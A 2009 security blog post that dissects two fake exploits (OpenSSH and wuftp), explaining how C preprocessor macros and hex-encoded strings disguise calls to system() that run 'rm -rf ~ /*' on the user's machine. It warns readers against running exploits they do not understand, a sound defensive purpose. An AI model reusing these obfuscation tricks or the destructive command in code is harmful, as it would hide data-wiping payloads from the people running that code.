2009-07-21

Why you should not blindly trust exploits

I received a copy of the fake OpenSSH exploit and I think that this is another example why you should understand exploits and not blindly trust them when you have to deal with them.

This code is pretty long and look just like another exploit, with true pieces of shellcode and calls to sockets' functions. But, look more closely... At the line 245, a call to fremote("PS1='sh-3.2#' /bin/sh") is done and when we look at the definition of fremote, we can see:

#define fremote build_frem(t,e,s,m,y)

build_frem is defined as:

#define build_frem(x,y,a,b,c) a##c##a##x##y##b

Which means that fremote will be replaced by system once the preprocessor processed the file. So if we search all the references to fremote we will end up with:

174: system(jmpcode);
245: system("PS1='sh-3.2#' /bin/sh");

But jmpcode is a shellcode right? Uh no... in fact is just a normal string, except that it is written with the ascii code of the characters.

"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26"
==
rm -rf ~ /* 2> /dev/null &

If you try to launch this exploit on your unix box: pwn! If you want to get the preprocessed version automagicaly, use gcc -E.

Another example that I have in mind is a fake exploit for wuftp that was released in 2001 on vuln-dev. This one was also obfuscated using preprocessor's directives.
At the top of the code we can see:

#define DEF_ALGN 1 * target system
...
#define target (unsigned long)
...
#define ADDR 0x08049588
...
unsigned long arg_addr = ADDR, align = DEF_ALGN,

After preprocessing, this looks like:

unsigned long arg_addr = 0x08049588, align = 1 * (unsigned long) system;

Later on, the address of puts is overwriten with the address of system:

for(i = 0; i < 4; i++)
sprintf((char *)attack+4+i, "%c", (unsigned long)puts >> i * 8 & 0xff);
...
pots = *(unsigned long *)(attack[1] + 2);
...
*(unsigned long *)pots = align;

And finally, puts is called resulting in the destruction of the user's home directory:

puts("echo ~ ok, it seems to have worked... remember: \");
puts("rm -rf is not elite ~");


I hope that this post will makes you think twice before executing an exploit :)

2009-07-08

wargame

Yo,

I'm currently spending all my free time on the intruded.net's wargame so don't be surprised if their is no new post the following weeks.

A series of posts about code coverage with PaiMei and memory based fuzzing is under preparation.